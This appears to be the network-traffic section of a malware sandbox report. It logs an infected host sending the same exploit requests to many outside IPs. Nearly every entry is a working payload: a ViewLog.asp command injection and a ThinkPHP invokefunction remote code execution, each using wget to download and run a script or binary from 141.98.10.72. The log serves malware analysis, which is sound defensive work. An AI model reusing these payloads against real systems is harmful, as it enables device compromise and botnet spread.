Feb 14, 2024 09:29:20.634442091 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:23.482480049 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:28.858278990 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:39.609869003 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:02.393345118 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:45.399952888 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
182	192.168.2.15	33008	31.136.103.45	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:18.618529081 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:19.290441990 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:20.634447098 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:23.482331038 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:28.858206987 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:39.609863043 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:02.393358946 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:45.399954081 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
183	192.168.2.15	36698	95.244.243.167	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:18.622298956 CET	300	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.
Feb 14, 2024 09:29:18.856954098 CET	498	IN	HTTP/1.1 401 Unauthorized WWW-Authenticate: Basic realm="Protected" Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4b 73 65 6e 69 61 20 4c 61 72 65 73 20 57 65 62 53 65 72 76 65 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 23 33 33 33 33 33 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 39 39 39 39 39 39 20 66 61 63 65 3d 22 56 65 72 64 61 6e 61 2c 47 65 6e 65 76 61 2c 73 61 6e 73 2d 73 65 72 69 66 22 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 70 3e 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3a 20 50 61 73 73 77 6f 72 64 20 72 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 62 72 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 32 30 31 35 2d 32 30 31 36 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 73 65 6e 69 61 73 65 63 75 72 69 74 79 2e 63 6f 6d 2f 22 20 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 66 66 33 33 33 33 3e 20 4b 73 65 6e 69 61 20 53 65 63 75 72 69 74 79 20 3c 2f 66 6f 6e 74 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 66 6f 6e 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Ksenia Lares WebServer</title></head><body bgcolor=#333333><font color=#999999 face="Verdana,Geneva,sans-serif"><div align="center"><p><h1>Unauthorized: Password required</h1><br></p></div><br><div align="center">Copyright © 2015-2016 <a href="http://www.kseniasecurity.com/" ><font color=#ff3333> Ksenia Security </font></a></div></div></font></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
184	192.168.2.15	59904	95.85.162.55	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:18.626252890 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
185	192.168.2.15	49842	31.200.108.187	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:18.646215916 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
186	192.168.2.15	60676	94.122.15.120	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:18.646423101 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
187	192.168.2.15	44156	94.187.104.128	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:18.651468039 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
188	192.168.2.15	36962	95.216.204.254	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:19.025451899 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:19.245142937 CET	48	IN	HTTP/1.1 101 Switching Protocols

Session ID	Source IP	Source Port	Destination IP	Destination Port
189	192.168.2.15	35438	95.163.141.100	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:19.037391901 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:19.271430016 CET	323	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:29:19 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
190	192.168.2.15	51830	95.56.127.179	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:19.093570948 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:19.384411097 CET	29	IN	HTTP/1.1 200 OK
Feb 14, 2024 09:29:19.384948969 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
191	192.168.2.15	49394	95.58.75.221	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:19.100235939 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:19.398494005 CET	29	IN	HTTP/1.1 200 OK
Feb 14, 2024 09:29:19.398586988 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
192	192.168.2.15	58368	95.100.5.123	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:19.170434952 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:19.537597895 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:29:19 GMT Date: Wed, 14 Feb 2024 08:29:19 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 35 37 32 32 63 33 31 26 23 34 36 3b 31 37 30 37 38 39 39 33 35 39 26 23 34 36 3b 32 30 30 38 33 65 64 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.55722c31.1707899359.20083ed6</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
193	192.168.2.15	56688	95.59.137.3	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:19.374732018 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:20.826395035 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:22.522315979 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:26.042218924 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:32.954032898 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:46.521625042 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:14.680826902 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
194	192.168.2.15	50986	31.200.76.23	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:19.422696114 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
195	192.168.2.15	58302	94.121.186.224	8080

Timestamp	Bytes transferred	Direction	Data
